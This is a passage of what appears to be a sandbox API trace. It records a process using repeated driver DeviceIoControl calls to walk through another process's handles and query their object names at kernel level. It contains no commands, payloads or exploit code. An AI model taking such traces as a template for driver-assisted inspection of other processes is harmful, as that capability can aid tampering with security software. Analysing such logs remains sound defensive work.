lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0223.498] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.498] PsAcquireProcessExitSynchronization () returned 0x0 [0223.498] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.498] ObReferenceObjectByHandle (in: Handle=0x5b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800369ee60, HandleInformation=0x0) returned 0x0 [0223.498] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.498] PsReleaseProcessExitSynchronization () returned 0x2 [0223.498] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.498] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.498] ObfDereferenceObject (Object=0xfffffa800369ee60) returned 0x12 [0223.498] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.498] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.498] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.498] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x110, lpOverlapped=0x0) returned 1 [0223.498] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.498] PsAcquireProcessExitSynchronization () returned 0x0 [0223.498] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.498] ObReferenceObjectByHandle (in: Handle=0x5b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039b4140, HandleInformation=0x0) returned 0x0 [0223.498] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.499] PsReleaseProcessExitSynchronization () returned 0x2 [0223.499] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.499] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.499] ObfDereferenceObject (Object=0xfffffa80039b4140) returned 0x12 [0223.499] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.792] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.792] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.792] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0223.792] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.792] PsAcquireProcessExitSynchronization () returned 0x0 [0223.792] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.792] ObReferenceObjectByHandle (in: Handle=0x5bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034ef820, HandleInformation=0x0) returned 0x0 [0223.793] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.793] PsReleaseProcessExitSynchronization () returned 0x2 [0223.793] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.793] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.793] ObfDereferenceObject (Object=0xfffffa80034ef820) returned 0x12 [0223.793] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.793] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.793] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.793] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xfe, lpOverlapped=0x0) returned 1 [0223.793] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.793] PsAcquireProcessExitSynchronization () returned 0x0 [0223.793] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.793] ObReferenceObjectByHandle (in: Handle=0x5c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034d75f0, HandleInformation=0x0) returned 0x0 [0223.793] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.793] PsReleaseProcessExitSynchronization () returned 0x2 [0223.793] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.793] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.793] ObfDereferenceObject (Object=0xfffffa80034d75f0) returned 0x12 [0223.794] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.794] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.794] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.794] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x11a, lpOverlapped=0x0) returned 1 [0223.794] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.794] PsAcquireProcessExitSynchronization () returned 0x0 [0223.794] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.794] ObReferenceObjectByHandle (in: Handle=0x5c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034e03d0, HandleInformation=0x0) returned 0x0 [0223.794] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.794] PsReleaseProcessExitSynchronization () returned 0x2 [0223.794] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.794] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.794] ObfDereferenceObject (Object=0xfffffa80034e03d0) returned 0x12 [0223.794] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.795] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.795] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.795] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0223.795] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.795] PsAcquireProcessExitSynchronization () returned 0x0 [0223.795] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.795] ObReferenceObjectByHandle (in: Handle=0x5cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034d7900, HandleInformation=0x0) returned 0x0 [0223.795] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.795] PsReleaseProcessExitSynchronization () returned 0x2 [0223.795] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.795] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.795] ObfDereferenceObject (Object=0xfffffa80034d7900) returned 0x13 [0223.795] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.795] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.796] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.796] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xd6, lpOverlapped=0x0) returned 1 [0223.796] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.796] PsAcquireProcessExitSynchronization () returned 0x0 [0223.796] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.796] ObReferenceObjectByHandle (in: Handle=0x5d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003748070, HandleInformation=0x0) returned 0x0 [0223.796] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.796] PsReleaseProcessExitSynchronization () returned 0x2 [0223.796] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.796] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.796] ObfDereferenceObject (Object=0xfffffa8003748070) returned 0x20 [0223.796] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.796] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.796] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.796] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xd8, lpOverlapped=0x0) returned 1 [0223.796] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.796] PsAcquireProcessExitSynchronization () returned 0x0 [0223.796] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.796] ObReferenceObjectByHandle (in: Handle=0x5e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034e38b0, HandleInformation=0x0) returned 0x0 [0223.796] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.796] PsReleaseProcessExitSynchronization () returned 0x2 [0223.796] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.796] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.796] ObfDereferenceObject (Object=0xfffffa80034e38b0) returned 0x20 [0223.797] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.797] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.797] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.797] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x118, lpOverlapped=0x0) returned 1 [0223.797] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.797] PsAcquireProcessExitSynchronization () returned 0x0 [0223.797] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.797] ObReferenceObjectByHandle (in: Handle=0x5e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034eaf20, HandleInformation=0x0) returned 0x0 [0223.797] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.797] PsReleaseProcessExitSynchronization () returned 0x2 [0223.797] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.797] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.797] ObfDereferenceObject (Object=0xfffffa80034eaf20) returned 0x12 [0223.797] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.797] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.797] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.797] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xea, lpOverlapped=0x0) returned 1 [0223.797] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.797] PsAcquireProcessExitSynchronization () returned 0x0 [0223.798] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.798] ObReferenceObjectByHandle (in: Handle=0x600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003ac8970, HandleInformation=0x0) returned 0x0 [0223.798] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.798] PsReleaseProcessExitSynchronization () returned 0x2 [0223.798] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.798] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.798] ObfDereferenceObject (Object=0xfffffa8003ac8970) returned 0x12 [0223.798] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.798] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.798] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.798] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3c, lpOverlapped=0x0) returned 1 [0223.798] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.798] PsAcquireProcessExitSynchronization () returned 0x0 [0223.798] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.798] ObReferenceObjectByHandle (in: Handle=0x624, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002ee2610, HandleInformation=0x0) returned 0x0 [0223.798] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.799] PsReleaseProcessExitSynchronization () returned 0x2 [0223.799] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.799] ObQueryNameString (in: Object=0xfffffa8002ee2610, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.799] ObfDereferenceObject (Object=0xfffffa8002ee2610) returned 0x2 [0223.799] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.799] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.799] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.799] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xcc, lpOverlapped=0x0) returned 1 [0223.799] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.799] PsAcquireProcessExitSynchronization () returned 0x0 [0223.799] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.799] ObReferenceObjectByHandle (in: Handle=0x628, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002571b80, HandleInformation=0x0) returned 0x0 [0223.799] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.799] PsReleaseProcessExitSynchronization () returned 0x2 [0223.799] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.799] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.799] ObfDereferenceObject (Object=0xfffffa8002571b80) returned 0x11 [0223.799] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.799] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.799] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.799] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0223.800] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.800] PsAcquireProcessExitSynchronization () returned 0x0 [0223.800] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.800] ObReferenceObjectByHandle (in: Handle=0x62c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80026abd00, HandleInformation=0x0) returned 0x0 [0223.800] ObfDereferenceObject (Object=0xfffffa80026abd00) returned 0x1 [0223.800] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.800] PsReleaseProcessExitSynchronization () returned 0x2 [0223.800] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.800] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.800] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.800] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.800] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0223.800] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.800] PsAcquireProcessExitSynchronization () returned 0x0 [0223.800] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.800] ObReferenceObjectByHandle (in: Handle=0x63c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0223.800] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.800] PsReleaseProcessExitSynchronization () returned 0x2 [0223.800] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.800] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.801] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x8 [0223.801] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.801] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.801] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.801] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0223.801] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.801] PsAcquireProcessExitSynchronization () returned 0x0 [0223.801] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.801] ObReferenceObjectByHandle (in: Handle=0x640, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002533590, HandleInformation=0x0) returned 0x0 [0223.801] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.801] PsReleaseProcessExitSynchronization () returned 0x2 [0223.801] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.801] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.801] ObfDereferenceObject (Object=0xfffffa8002533590) returned 0x11 [0223.801] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.801] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.801] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.801] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xd8, lpOverlapped=0x0) returned 1 [0223.801] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.801] PsAcquireProcessExitSynchronization () returned 0x0 [0223.801] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.801] ObReferenceObjectByHandle (in: Handle=0x64c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002837920, HandleInformation=0x0) returned 0x0 [0223.801] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.801] PsReleaseProcessExitSynchronization () returned 0x2 [0223.802] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.802] ObQueryNameString (in: 